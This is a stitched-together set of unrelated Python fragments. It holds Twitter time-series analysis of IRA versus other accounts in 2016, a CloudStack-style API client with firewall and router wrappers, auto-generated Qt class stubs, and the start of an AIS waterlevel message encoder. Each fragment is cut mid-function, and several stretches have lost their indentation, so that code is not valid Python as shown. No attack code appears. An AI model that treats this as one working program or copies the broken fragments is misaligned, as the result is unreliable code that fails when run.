            w = line.strip().split()
            uid = w[1]
            _dt = w[2] + " " + w[3]
            if uid in non_IRA_nodes:
                non_dts.append(_dt)
        non_ts = pd.to_datetime(non_dts)
        non_ts = non_ts.value_counts()
        non_ts = non_ts.resample("15Min").sum()
        # Same window/blackout filtering as get_ts.
        non_ts = non_ts[(non_ts.index >= "2016-06-01") & (non_ts.index < "2016-11-09")]
        non_ts = non_ts[~non_ts.index.isin(should_remove_15Min)]
        return non_ts
    G = nx.read_gpickle(f"data/graph/C{cN}-{layer}-layer.gpickle")
    # Partition the community graph into IRA vs non-IRA accounts.
    IRA_nodes = set([n for n in G.nodes if Putin.check(n)])
    non_IRA_nodes = set([n for n in G.nodes if not Putin.check(n)])
    print("IRA and non-IRA:", len(IRA_nodes), len(non_IRA_nodes))
    influ = {line.strip() for line in open(f"data/influencers/C{cN}-uid.txt")}
    non_IRA_influ_nodes = set([n for n in G.nodes
                               if not Putin.check(n) and n in influ])
    non_IRA_non_influ_nodes = set([n for n in G.nodes
                                   if not Putin.check(n) and n not in influ])
    print("non-IRA influ and non-influ:", len(non_IRA_influ_nodes), len(non_IRA_non_influ_nodes))
    # NOTE: despite the *_IRA_nodes names, these hold NON-IRA accounts
    # split by candidate support ("T" = Trump, "C" = Clinton).
    T_IRA_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
                       and users_opinion[n] == "T"])
    C_IRA_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
                       and users_opinion[n] == "C"])
    print("Trump & Clinton:", len(T_IRA_nodes), len(C_IRA_nodes))
    T_flu_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
                       and users_opinion[n] == "T" and n in influ])
    C_flu_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
                       and users_opinion[n] == "C" and n in influ])
    print("Trump & Clinton (flu):", len(T_flu_nodes), len(C_flu_nodes))
    T_nonflu_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
                          and users_opinion[n] == "T" and n not in influ])
    C_nonflu_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
                          and users_opinion[n] == "C" and n not in influ])
    print("Trump & Clinton (non flu):", len(T_nonflu_nodes), len(C_nonflu_nodes))
    ts = get_ts(IRA_nodes)
    non_ts = get_non(non_IRA_nodes)
    influ_ts = get_non(non_IRA_influ_nodes)
    non_influ_ts = get_non(non_IRA_non_influ_nodes)
    T_ts = get_non(T_IRA_nodes)
    C_ts = get_non(C_IRA_nodes)
    T_flu_ts = get_non(T_flu_nodes)
    C_flu_ts = get_non(C_flu_nodes)
    T_nonflu_ts = get_non(T_nonflu_nodes)
    C_nonflu_ts = get_non(C_nonflu_nodes)
    tsts = pd.DataFrame({
        "ts": ts, "non_ts": non_ts, "T_ts": T_ts, "C_ts": C_ts,
        "influ_ts": influ_ts, "non_influ_ts": non_influ_ts,
        "T_flu_ts": T_flu_ts, "C_flu_ts": C_flu_ts,
        "T_nonflu_ts": T_nonflu_ts, "C_nonflu_ts": C_nonflu_ts,
    })
    tsts.to_pickle(f"data/tsts/C{cN}-{layer}-layer.pl")
def get_tsss_user(cN, layer="one"):
    """Like get_tsss, but count distinct active users per 15-minute bin.

    Each (user, bin) pair contributes at most once to the series. The
    combined DataFrame is pickled to data/tsts/C{cN}-{layer}-layer-user.pl.
    """
    # Uses the module-level get_15min; the original carried an identical
    # nested copy of it.
    def get_ts(IRA_nodes):
        # Unique-user 15-min series for IRA accounts.
        user_set = set()
        dts = []
        for i, row in tqdm(IRA_data.iterrows()):
            u = Putin.uncover(row.userid)
            if u in IRA_nodes:
                _dt = row.tweet_time
                # Shift to EST, then snap to the 15-minute bucket.
                _dt = pendulum.parse(_dt).add(hours=-4).to_datetime_string()
                _dt = get_15min(_dt).to_datetime_string()
                if u + "~" + _dt not in user_set:
                    user_set.add(u + "~" + _dt)
                    dts.append(_dt)
        ts = pd.to_datetime(dts)
        ts = ts.value_counts()
        ts = ts.resample("15Min").sum()
        ts = ts[(ts.index >= "2016-06-01") & (ts.index < "2016-11-09")]
        ts = ts[~ts.index.isin(should_remove_15Min)]
        return ts
    def get_non(non_IRA_nodes):
        # Unique-user 15-min series for non-IRA accounts; the input file
        # disk/user_time_15Mins.txt is already bucketed by get_15min_file().
        user_set = set()
        non_dts = []
        for line in tqdm(open('disk/user_time_15Mins.txt')):
            w = line.strip().split()
            u = w[1]
            _dt = w[2] + " " + w[3]
            # BUG FIX: original tested `uid in non_IRA_nodes`, but `uid` is
            # undefined in this scope (NameError); the user id is `u`.
            if u in non_IRA_nodes:
                if u + "~" + _dt not in user_set:
                    user_set.add(u + "~" + _dt)
                    non_dts.append(_dt)
        non_ts = pd.to_datetime(non_dts)
        non_ts = non_ts.value_counts()
        non_ts = non_ts.resample("15Min").sum()
        non_ts = non_ts[(non_ts.index >= "2016-06-01") & (non_ts.index < "2016-11-09")]
        non_ts = non_ts[~non_ts.index.isin(should_remove_15Min)]
        return non_ts
    G = nx.read_gpickle(f"data/graph/C{cN}-{layer}-layer.gpickle")
    IRA_nodes = set([n for n in G.nodes if Putin.check(n)])
    non_IRA_nodes = set([n for n in G.nodes if not Putin.check(n)])
    # Non-IRA accounts split by candidate support ("T" = Trump, "C" = Clinton).
    T_IRA_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion and users_opinion[n] == "T"])
    C_IRA_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion and users_opinion[n] == "C"])
    ts = get_ts(IRA_nodes)
    non_ts = get_non(non_IRA_nodes)
    T_ts = get_non(T_IRA_nodes)
    C_ts = get_non(C_IRA_nodes)
    tsts = pd.DataFrame({"ts": ts, "non_ts": non_ts, "T_ts": T_ts, "C_ts": C_ts})
    tsts.to_pickle(f"data/tsts/C{cN}-{layer}-layer-user.pl")
def calculate_resid(cN, layer="two"):
    """Strip seasonality and trend from each series via STL decomposition.

    Reads data/tsts/C{cN}-{layer}-layer.pl, keeps only the STL residuals of
    every column, and pickles them to data/tsts/resid_C{cN}-{layer}-layer.pl.
    """
    # remove seasonality and trend
    # STL configuration: 96 bins of 15 minutes = one daily season.
    stl_params = dict(
        np=96,        # period of season
        ns=95,        # seasonal smoothing
        nt=None,      # trend smoothing: int((1.5*np)/(1-(1.5/ns)))
        nl=None,      # low-pass filter: least odd integer >= np
        isdeg=1,
        itdeg=1,
        ildeg=1,
        robust=True,
        ni=1,
        no=5)
    frame = pd.read_pickle(f"data/tsts/C{cN}-{layer}-layer.pl")
    resid = pd.DataFrame(index=frame.index)
    print("Loaded!")
    series_names = ["ts", "non_ts", "T_ts", "C_ts", "influ_ts", "non_influ_ts",
                    "T_flu_ts", "C_flu_ts", "T_nonflu_ts", "C_nonflu_ts"]
    for name in series_names:
        print(name)
        frame[name] = frame[name].fillna(0)
        resid[name] = stl(frame[name].values, **stl_params).residuals
    resid.to_pickle(f"data/tsts/resid_C{cN}-{layer}-layer.pl")
    print("saved!")
def analyze_ts_of_communities(cN, layer="one", user=False):
if user:
tsts = pd.read_pickle(f"data/tsts/C{cN}-{layer}-layer-user.pl")
else:
tsts = pd.read_pickle(f"data/tsts/C{cN}-{layer}-layer.pl")
# print(tsts)
sns.set(style="white", font_scale=1.2)
fig, ax1 = plt.subplots(figsize=(20, 6))
color = 'tab:red'
ax1.set_ylabel('IRA', color=color) # we already handled the x-label with ax1
ax1.plot("ts", data=tsts, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel('non-IRA', color=color) # we already handled the x-label with ax1
ax2.plot("non_ts", data=tsts, color=color, lw=0.8)
ax2.tick_params(axis='y', labelcolor=color)
# ax2.xaxis.set_major_formatter(ticker.FuncFormatter(format_date))
# fig.autofmt_xdate()
plt.savefig(f"fig/c{cN}-{layer}-layer-ts.pdf", dpi=300)
# plt.show()
plt.close()
if user:
tsts_resid = pd.read_pickle(f"data/tsts/resid_C{cN}-{layer}-layer-user.pl")
else:
tsts_resid = pd.read_pickle(f"data/tsts/resid_C{cN}-{layer}-layer.pl")
# print(tsts_resid)
sns.set(style="white", font_scale=1.2)
fig, ax1 = plt.subplots(figsize=(20, 6))
color = 'tab:red'
ax1.set_ylabel('IRA (residuals)', color=color) # we already handled the x-label with ax1
# ax1.set_ylim((-600, 600))
ax1.plot("ts", data=tsts_resid, color=color, lw=1)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel("non-IRA (residuals)", color=color) # we already handled the x-label with ax1
# ax2.set_ylim((-20000, 20000))
ax2.plot("non_ts", data=tsts_resid, color=color, lw=1)
ax2.tick_params(axis='y', labelcolor=color)
plt.savefig(f"fig/c{cN}-{layer}-layer-resid.pdf", dpi=300)
# plt.show()
plt.close()
# sns.set(style="white")
# 相关性分析
# f = plt.figure(figsize=(7, 6))
# plt.matshow(tsts.corr(), fignum=f.number, cmap='Purples')
# plt.xticks(range(tsts.shape[1]), tsts.columns, fontsize=11, rotation=45)
# plt.yticks(range(tsts.shape[1]), tsts.columns, | |
false, list only resources belonging to the command's
caller; if set to true - list resources that the caller is authorized to see.
Default value is false
page -
pagesize -
projectid - list firewall rules by project
page - Pagination
'''
return self.request('listPortForwardingRules', args)
def createPortForwardingRule(self, args={}):
'''
Creates a port forwarding rule
args - A dictionary. The following are options for keys:
ipaddressid - the IP address id of the port forwarding rule
privateport - the starting port of port forwarding rule's private port
range
protocol - the protocol for the port fowarding rule. Valid values are TCP or
UDP.
publicport - the starting port of port forwarding rule's public port range
virtualmachineid - the ID of the virtual machine for the port forwarding
rule
cidrlist - the cidr list to forward traffic from
openfirewall - if true, firewall rule for source/end pubic port is
automatically created; if false - firewall rule has to be created explicitely.
Has value true by default
'''
if 'ipaddressid' not in args:
raise RuntimeError("Missing required argument 'ipaddressid'")
if 'privateport' not in args:
raise RuntimeError("Missing required argument 'privateport'")
if 'protocol' not in args:
raise RuntimeError("Missing required argument 'protocol'")
if 'publicport' not in args:
raise RuntimeError("Missing required argument 'publicport'")
if 'virtualmachineid' not in args:
raise RuntimeError("Missing required argument 'virtualmachineid'")
return self.request('createPortForwardingRule', args)
def deletePortForwardingRule(self, args={}):
'''
Deletes a port forwarding rule
args - A dictionary. The following are options for keys:
id - the ID of the port forwarding rule
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('deletePortForwardingRule', args)
def createFirewallRule(self, args={}):
'''
Creates a firewall rule for a given ip address
args - A dictionary. The following are options for keys:
protocol - the protocol for the firewall rule. Valid values are
TCP/UDP/ICMP.
cidrlist - the cidr list to forward traffic from
endport - the ending port of firewall rule
icmpcode - error code for this icmp message
icmptype - type of the icmp message being sent
ipaddressid - the IP address id of the port forwarding rule
startport - the starting port of firewall rule
type - type of firewallrule: system/user
'''
if 'protocol' not in args:
raise RuntimeError("Missing required argument 'protocol'")
return self.request('createFirewallRule', args)
def deleteFirewallRule(self, args={}):
'''
Deletes a firewall rule
args - A dictionary. The following are options for keys:
id - the ID of the firewall rule
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('deleteFirewallRule', args)
def listFirewallRules(self, args={}):
'''
Lists all firewall rules for an IP address.
args - A dictionary. The following are options for keys:
account - List resources by account. Must be used with the domainId
parameter.
domainid - list only resources belonging to the domain specified
id - Lists rule with the specified ID.
ipaddressid - the id of IP address of the firwall services
isrecursive - defaults to false, but if true, lists all resources from the
parent specified by the domainId till leaves.
keyword - List by keyword
listall - If set to false, list only resources belonging to the command's
caller; if set to true - list resources that the caller is authorized to see.
Default value is false
page -
pagesize -
projectid - list firewall rules by project
page - Pagination
'''
return self.request('listFirewallRules', args)
def addSrxFirewall(self, args={}):
'''
Adds a SRX firewall device
args - A dictionary. The following are options for keys:
networkdevicetype - supports only JuniperSRXFirewall
password - <PASSWORD> reach SRX firewall device
physicalnetworkid - the Physical Network ID
url - URL of the SRX appliance.
username - Credentials to reach SRX firewall device
'''
if 'networkdevicetype' not in args:
raise RuntimeError("Missing required argument 'networkdevicetype'")
if 'password' not in args:
raise RuntimeError("Missing required argument 'password'")
if 'physicalnetworkid' not in args:
raise RuntimeError("Missing required argument 'physicalnetworkid'")
if 'url' not in args:
raise RuntimeError("Missing required argument 'url'")
if 'username' not in args:
raise RuntimeError("Missing required argument 'username'")
return self.request('addSrxFirewall', args)
def deleteSrxFirewall(self, args={}):
'''
delete a SRX firewall device
args - A dictionary. The following are options for keys:
fwdeviceid - srx firewall device ID
'''
if 'fwdeviceid' not in args:
raise RuntimeError("Missing required argument 'fwdeviceid'")
return self.request('deleteSrxFirewall', args)
def configureSrxFirewall(self, args={}):
'''
Configures a SRX firewall device
args - A dictionary. The following are options for keys:
fwdeviceid - SRX firewall device ID
fwdevicecapacity - capacity of the firewall device, Capacity will be
interpreted as number of networks device can handle
'''
if 'fwdeviceid' not in args:
raise RuntimeError("Missing required argument 'fwdeviceid'")
return self.request('configureSrxFirewall', args)
def listSrxFirewalls(self, args={}):
'''
lists SRX firewall devices in a physical network
args - A dictionary. The following are options for keys:
fwdeviceid - SRX firewall device ID
keyword - List by keyword
page -
pagesize -
physicalnetworkid - the Physical Network ID
page - Pagination
'''
return self.request('listSrxFirewalls', args)
def startRouter(self, args={}):
'''
Starts a router.
args - A dictionary. The following are options for keys:
id - the ID of the router
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('startRouter', args)
def rebootRouter(self, args={}):
'''
Starts a router.
args - A dictionary. The following are options for keys:
id - the ID of the router
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('rebootRouter', args)
def stopRouter(self, args={}):
'''
Stops a router.
args - A dictionary. The following are options for keys:
id - the ID of the router
forced - Force stop the VM. The caller knows the VM is stopped.
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('stopRouter', args)
def destroyRouter(self, args={}):
'''
Destroys a router.
args - A dictionary. The following are options for keys:
id - the ID of the router
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('destroyRouter', args)
def changeServiceForRouter(self, args={}):
'''
Upgrades domain router to a new service offering
args - A dictionary. The following are options for keys:
id - The ID of the router
serviceofferingid - the service offering ID to apply to the domain router
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
if 'serviceofferingid' not in args:
raise RuntimeError("Missing required argument 'serviceofferingid'")
return self.request('changeServiceForRouter', args)
def listRouters(self, args={}):
'''
List routers.
args - A dictionary. The following are options for keys:
account - List resources by account. Must be used with the domainId
parameter.
domainid - list only resources belonging to the domain specified
hostid - the host ID of the router
id - the ID of the disk router
isrecursive - defaults to false, but if true, lists all resources from the
parent specified by the domainId till leaves.
keyword - List by keyword
listall - If set to false, list only resources belonging to the command's
caller; if set to true - list resources that the caller is authorized to see.
Default value is false
name - the name of the router
networkid - list by network id
page -
pagesize -
podid - the Pod ID of the router
projectid - list firewall rules by project
state - the state of the router
zoneid - the Zone ID of the router
page - Pagination
'''
return self.request('listRouters', args)
def createVirtualRouterElement(self, args={}):
'''
Create a virtual router element.
args - A dictionary. The following are options for keys:
nspid - the network service provider ID of the virtual router element
'''
if 'nspid' not in args:
raise RuntimeError("Missing required argument 'nspid'")
return self.request('createVirtualRouterElement', args)
def configureVirtualRouterElement(self, args={}):
'''
Configures a virtual router element.
args - A dictionary. The following are options for keys:
id - the ID of the virtual router provider
enabled - Enabled/Disabled the service provider
'''
if 'id' not in args:
| |
pass
    # Auto-generated API stub: every method body is an intentionally empty
    # placeholder and every class attribute is a None placeholder for an
    # enum value / Qt signal. Presumably the interior of a QFileDialog stub —
    # the class header is above this chunk; verify against the real module.
    def saveState(*args, **kwargs):
        pass
    def selectFile(*args, **kwargs):
        pass
    def selectMimeTypeFilter(*args, **kwargs):
        pass
    def selectNameFilter(*args, **kwargs):
        pass
    def selectUrl(*args, **kwargs):
        pass
    def selectedFiles(*args, **kwargs):
        pass
    def selectedNameFilter(*args, **kwargs):
        pass
    def selectedUrls(*args, **kwargs):
        pass
    def setAcceptMode(*args, **kwargs):
        pass
    def setConfirmOverwrite(*args, **kwargs):
        pass
    def setDefaultSuffix(*args, **kwargs):
        pass
    def setDirectory(*args, **kwargs):
        pass
    def setDirectoryUrl(*args, **kwargs):
        pass
    def setFileMode(*args, **kwargs):
        pass
    def setFilter(*args, **kwargs):
        pass
    def setHistory(*args, **kwargs):
        pass
    def setIconProvider(*args, **kwargs):
        pass
    def setItemDelegate(*args, **kwargs):
        pass
    def setLabelText(*args, **kwargs):
        pass
    def setMimeTypeFilters(*args, **kwargs):
        pass
    def setNameFilter(*args, **kwargs):
        pass
    def setNameFilterDetailsVisible(*args, **kwargs):
        pass
    def setNameFilters(*args, **kwargs):
        pass
    def setOption(*args, **kwargs):
        pass
    def setOptions(*args, **kwargs):
        pass
    def setProxyModel(*args, **kwargs):
        pass
    def setReadOnly(*args, **kwargs):
        pass
    def setResolveSymlinks(*args, **kwargs):
        pass
    def setSidebarUrls(*args, **kwargs):
        pass
    def setSupportedSchemes(*args, **kwargs):
        pass
    def setViewMode(*args, **kwargs):
        pass
    def setVisible(*args, **kwargs):
        pass
    def sidebarUrls(*args, **kwargs):
        pass
    def supportedSchemes(*args, **kwargs):
        pass
    def testOption(*args, **kwargs):
        pass
    def viewMode(*args, **kwargs):
        pass
    # Static convenience dialogs (getOpenFileName etc.) in the real Qt API.
    def getExistingDirectory(*args, **kwargs):
        pass
    def getExistingDirectoryUrl(*args, **kwargs):
        pass
    def getOpenFileName(*args, **kwargs):
        pass
    def getOpenFileNames(*args, **kwargs):
        pass
    def getOpenFileUrl(*args, **kwargs):
        pass
    def getOpenFileUrls(*args, **kwargs):
        pass
    def getSaveFileName(*args, **kwargs):
        pass
    def getSaveFileUrl(*args, **kwargs):
        pass
    # Enum-value and signal placeholders (populated by the real binding).
    Accept = None
    AcceptMode = None
    AcceptOpen = None
    AcceptSave = None
    AnyFile = None
    Detail = None
    DialogLabel = None
    Directory = None
    DirectoryOnly = None
    DontConfirmOverwrite = None
    DontResolveSymlinks = None
    DontUseCustomDirectoryIcons = None
    DontUseNativeDialog = None
    DontUseSheet = None
    ExistingFile = None
    ExistingFiles = None
    FileMode = None
    FileName = None
    FileType = None
    HideNameFilterDetails = None
    List = None
    LookIn = None
    Option = None
    Options = None
    ReadOnly = None
    Reject = None
    ShowDirsOnly = None
    ViewMode = None
    __new__ = None
    currentChanged = None
    currentUrlChanged = None
    directoryEntered = None
    directoryUrlEntered = None
    fileSelected = None
    filesSelected = None
    filterSelected = None
    staticMetaObject = None
    urlSelected = None
    urlsSelected = None
class QGraphicsEllipseItem(QAbstractGraphicsShapeItem):
    # Auto-generated stub for Qt's QGraphicsEllipseItem: method bodies are
    # intentionally empty placeholders; see the real Qt class for behavior.
    def __init__(*args, **kwargs):
        """
        x.__init__(...) initializes x; see help(type(x)) for signature
        """
        pass
    def boundingRect(*args, **kwargs):
        pass
    def contains(*args, **kwargs):
        pass
    def extension(*args, **kwargs):
        pass
    def isObscuredBy(*args, **kwargs):
        pass
    def opaqueArea(*args, **kwargs):
        pass
    def paint(*args, **kwargs):
        pass
    def rect(*args, **kwargs):
        pass
    def setRect(*args, **kwargs):
        pass
    def setSpanAngle(*args, **kwargs):
        pass
    def setStartAngle(*args, **kwargs):
        pass
    def shape(*args, **kwargs):
        pass
    def spanAngle(*args, **kwargs):
        pass
    def startAngle(*args, **kwargs):
        pass
    def type(*args, **kwargs):
        pass
    __new__ = None
class QSlider(QAbstractSlider):
    # Auto-generated stub for Qt's QSlider: empty placeholder methods and
    # None placeholders for tick-position enum values.
    def __init__(*args, **kwargs):
        """
        x.__init__(...) initializes x; see help(type(x)) for signature
        """
        pass
    def event(*args, **kwargs):
        pass
    def initStyleOption(*args, **kwargs):
        pass
    def minimumSizeHint(*args, **kwargs):
        pass
    def mouseMoveEvent(*args, **kwargs):
        pass
    def mousePressEvent(*args, **kwargs):
        pass
    def mouseReleaseEvent(*args, **kwargs):
        pass
    def paintEvent(*args, **kwargs):
        pass
    def setTickInterval(*args, **kwargs):
        pass
    def setTickPosition(*args, **kwargs):
        pass
    def sizeHint(*args, **kwargs):
        pass
    def tickInterval(*args, **kwargs):
        pass
    def tickPosition(*args, **kwargs):
        pass
    # TickPosition enum placeholders and Qt meta-object placeholder.
    NoTicks = None
    TickPosition = None
    TicksAbove = None
    TicksBelow = None
    TicksBothSides = None
    TicksLeft = None
    TicksRight = None
    __new__ = None
    staticMetaObject = None
class QGraphicsWidget(QGraphicsObject, QGraphicsLayoutItem):
    # Auto-generated stub for Qt's QGraphicsWidget: every method body is an
    # intentionally empty placeholder; signals at the bottom are None
    # placeholders. See the real Qt class for semantics.
    def __init__(*args, **kwargs):
        """
        x.__init__(...) initializes x; see help(type(x)) for signature
        """
        pass
    def actions(*args, **kwargs):
        pass
    def addAction(*args, **kwargs):
        pass
    def addActions(*args, **kwargs):
        pass
    def adjustSize(*args, **kwargs):
        pass
    def autoFillBackground(*args, **kwargs):
        pass
    def boundingRect(*args, **kwargs):
        pass
    def changeEvent(*args, **kwargs):
        pass
    def close(*args, **kwargs):
        pass
    def closeEvent(*args, **kwargs):
        pass
    def event(*args, **kwargs):
        pass
    def focusInEvent(*args, **kwargs):
        pass
    def focusNextPrevChild(*args, **kwargs):
        pass
    def focusOutEvent(*args, **kwargs):
        pass
    def focusPolicy(*args, **kwargs):
        pass
    def focusWidget(*args, **kwargs):
        pass
    def font(*args, **kwargs):
        pass
    def getContentsMargins(*args, **kwargs):
        pass
    def getWindowFrameMargins(*args, **kwargs):
        pass
    def grabKeyboardEvent(*args, **kwargs):
        pass
    def grabMouseEvent(*args, **kwargs):
        pass
    def grabShortcut(*args, **kwargs):
        pass
    def hideEvent(*args, **kwargs):
        pass
    def hoverLeaveEvent(*args, **kwargs):
        pass
    def hoverMoveEvent(*args, **kwargs):
        pass
    def initStyleOption(*args, **kwargs):
        pass
    def insertAction(*args, **kwargs):
        pass
    def insertActions(*args, **kwargs):
        pass
    def isActiveWindow(*args, **kwargs):
        pass
    def itemChange(*args, **kwargs):
        pass
    def layout(*args, **kwargs):
        pass
    def layoutDirection(*args, **kwargs):
        pass
    def moveEvent(*args, **kwargs):
        pass
    def paint(*args, **kwargs):
        pass
    def paintWindowFrame(*args, **kwargs):
        pass
    def palette(*args, **kwargs):
        pass
    def polishEvent(*args, **kwargs):
        pass
    def propertyChange(*args, **kwargs):
        pass
    def rect(*args, **kwargs):
        pass
    def releaseShortcut(*args, **kwargs):
        pass
    def removeAction(*args, **kwargs):
        pass
    def resize(*args, **kwargs):
        pass
    def resizeEvent(*args, **kwargs):
        pass
    def sceneEvent(*args, **kwargs):
        pass
    def setAttribute(*args, **kwargs):
        pass
    def setAutoFillBackground(*args, **kwargs):
        pass
    def setContentsMargins(*args, **kwargs):
        pass
    def setFocusPolicy(*args, **kwargs):
        pass
    def setFont(*args, **kwargs):
        pass
    def setGeometry(*args, **kwargs):
        pass
    def setLayout(*args, **kwargs):
        pass
    def setLayoutDirection(*args, **kwargs):
        pass
    def setPalette(*args, **kwargs):
        pass
    def setShortcutAutoRepeat(*args, **kwargs):
        pass
    def setShortcutEnabled(*args, **kwargs):
        pass
    def setStyle(*args, **kwargs):
        pass
    def setWindowFlags(*args, **kwargs):
        pass
    def setWindowFrameMargins(*args, **kwargs):
        pass
    def setWindowTitle(*args, **kwargs):
        pass
    def shape(*args, **kwargs):
        pass
    def showEvent(*args, **kwargs):
        pass
    def size(*args, **kwargs):
        pass
    def sizeHint(*args, **kwargs):
        pass
    def style(*args, **kwargs):
        pass
    def testAttribute(*args, **kwargs):
        pass
    def type(*args, **kwargs):
        pass
    def ungrabKeyboardEvent(*args, **kwargs):
        pass
    def ungrabMouseEvent(*args, **kwargs):
        pass
    def unsetLayoutDirection(*args, **kwargs):
        pass
    def unsetWindowFrameMargins(*args, **kwargs):
        pass
    def updateGeometry(*args, **kwargs):
        pass
    def windowFlags(*args, **kwargs):
        pass
    def windowFrameEvent(*args, **kwargs):
        pass
    def windowFrameGeometry(*args, **kwargs):
        pass
    def windowFrameRect(*args, **kwargs):
        pass
    def windowFrameSectionAt(*args, **kwargs):
        pass
    def windowTitle(*args, **kwargs):
        pass
    def windowType(*args, **kwargs):
        pass
    def setTabOrder(*args, **kwargs):
        pass
    # Signal placeholders and Qt meta-object placeholder.
    __new__ = None
    geometryChanged = None
    layoutChanged = None
    staticMetaObject = None
class QErrorMessage(QDialog):
    # Auto-generated stub for Qt's QErrorMessage dialog: placeholder bodies only.
    def __init__(*args, **kwargs):
        """
        x.__init__(...) initializes x; see help(type(x)) for signature
        """
        pass
    def changeEvent(*args, **kwargs):
        pass
    def done(*args, **kwargs):
        pass
    def showMessage(*args, **kwargs):
        pass
    def qtHandler(*args, **kwargs):
        pass
    __new__ = None
    staticMetaObject = None
class QGraphicsLinearLayout(QGraphicsLayout):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def addItem(*args, **kwargs):
pass
def addStretch(*args, **kwargs):
pass
def alignment(*args, | |
#!/usr/bin/env python
"""Autogenerated python functions to serialize/deserialize binary messages.
Generated by: ../scripts/aisxmlbinmsg2py.py
Need to then wrap these functions with the outer AIS packet and then
convert the whole binary blob to a NMEA string. Those functions are
not currently provided in this file.
serialize: python to ais binary
deserialize: ais binary to python
The generated code uses translators.py, binary.py, and aisstring.py
which should be packaged with the resulting files.
TODO(schwehr):FIX: put in a description of the message here with fields and types.
"""
import sys
from decimal import Decimal
import unittest
from aisutils.BitVector import BitVector
from aisutils import aisstring
from aisutils import binary
from aisutils import sqlhelp
from aisutils import uscg
# FIX: check to see if these will be needed
# Pre-built single-bit vectors shared by the codec so the True/False bits are
# not rebuilt on every call.
TrueBV = BitVector(bitstring="1")
"Why always rebuild the True bit? This should speed things up a bunch"
FalseBV = BitVector(bitstring="0")
"Why always rebuild the False bit? This should speed things up a bunch"
# Field names of the waterlevel message, in wire order.
fieldList = (
    'MessageID',
    'RepeatIndicator',
    'UserID',
    'Spare',
    'dac',
    'fid',
    'month',
    'day',
    'hour',
    'min',
    'stationid',
    'waterlevel',
    'datum',
    'sigma',
    'source',
)
# Same field names as used for Postgres columns (identical here since
# toPgFields below is empty — no renames apply).
fieldListPostgres = (
    'MessageID',
    'RepeatIndicator',
    'UserID',
    'Spare',
    'dac',
    'fid',
    'month',
    'day',
    'hour',
    'min',
    'stationid',
    'waterlevel',
    'datum',
    'sigma',
    'source',
)
# Empty mappings: this message defines no PostGIS-specific field renames/types.
toPgFields = {
}
"""
Go to the Postgis field names from the straight field name
"""
fromPgFields = {
}
"""
Go from the Postgis field names to the straight field name
"""
pgTypes = {
}
"""
Lookup table for each postgis field name to get its type.
"""
def encode(params, validate=False):
    '''Create a waterlevel binary message payload to pack into an AIS Msg waterlevel.
    Fields in params:
      - MessageID(uint): AIS message number.  Must be 8 (field automatically set to "8")
      - RepeatIndicator(uint): Indicated how many times a message has been repeated
      - UserID(uint): Unique ship identification number (MMSI)
      - Spare(uint): Reserved for definition by a regional authority. (field automatically set to "0")
      - dac(uint): Designated Area Code (field automatically set to "366")
      - fid(uint): Functional Identifier (field automatically set to "63")
      - month(uint): Time the measurement represents month 1..12
      - day(uint): Time the measurement represents day of the month 1..31
      - hour(uint): Time the measurement represents UTC hours 0..23
      - min(uint): Time the measurement represents minutes
      - stationid(aisstr6): Character identifier of the station.  Usually a number.
      - waterlevel(int): Water level in centimeters
      - datum(uint): What reference datum applies to the value
      - sigma(uint): Standard deviation of 1 second samples used to compute the water level height.  FIX: is this the correct description of sigma?
      - source(uint): How the water level was derived
    @param params: Dictionary of field names/values.  Throws a ValueError exception if required is missing
    @param validate: Set to true to cause checking to occur.  Runs slower.  FIX: not implemented.
    @rtype: BitVector
    @return: encoded binary message (for binary messages, this needs to be wrapped in a msg 8
    @note: The returned bits may not be 6 bit aligned.  It is up to you to pad out the bits.
    '''
    # The append order below defines the wire format (matches the bit offsets
    # used by decode()): do not reorder.
    bvList = []
    # MessageID: 6 bits, fixed to 8.
    bvList.append(binary.setBitVectorSize(BitVector(intVal=8),6))
    # RepeatIndicator: 2 bits, default 0.
    if 'RepeatIndicator' in params:
        bvList.append(binary.setBitVectorSize(BitVector(intVal=params['RepeatIndicator']),2))
    else:
        bvList.append(binary.setBitVectorSize(BitVector(intVal=0),2))
    # UserID (MMSI): 30 bits, required — KeyError if absent.
    bvList.append(binary.setBitVectorSize(BitVector(intVal=params['UserID']),30))
    # Spare: 2 bits fixed 0; dac: 10 bits fixed 366; fid: 6 bits fixed 63.
    bvList.append(binary.setBitVectorSize(BitVector(intVal=0),2))
    bvList.append(binary.setBitVectorSize(BitVector(intVal=366),10))
    bvList.append(binary.setBitVectorSize(BitVector(intVal=63),6))
    # Timestamp fields: month 4 bits, day 5, hour 5, min 6 — all required.
    bvList.append(binary.setBitVectorSize(BitVector(intVal=params['month']),4))
    bvList.append(binary.setBitVectorSize(BitVector(intVal=params['day']),5))
    bvList.append(binary.setBitVectorSize(BitVector(intVal=params['hour']),5))
    bvList.append(binary.setBitVectorSize(BitVector(intVal=params['min']),6))
    # stationid: 42 bits of 6-bit AIS chars; '@' is the AIS padding character.
    if 'stationid' in params:
        bvList.append(aisstring.encode(params['stationid'],42))
    else:
        bvList.append(aisstring.encode('@@@@@@@',42))
    # waterlevel: signed 16 bits; -32768 is the "not available" sentinel.
    if 'waterlevel' in params:
        bvList.append(binary.bvFromSignedInt(params['waterlevel'],16))
    else:
        bvList.append(binary.bvFromSignedInt(-32768,16))
    # datum: 5 bits, default 31 (unknown).
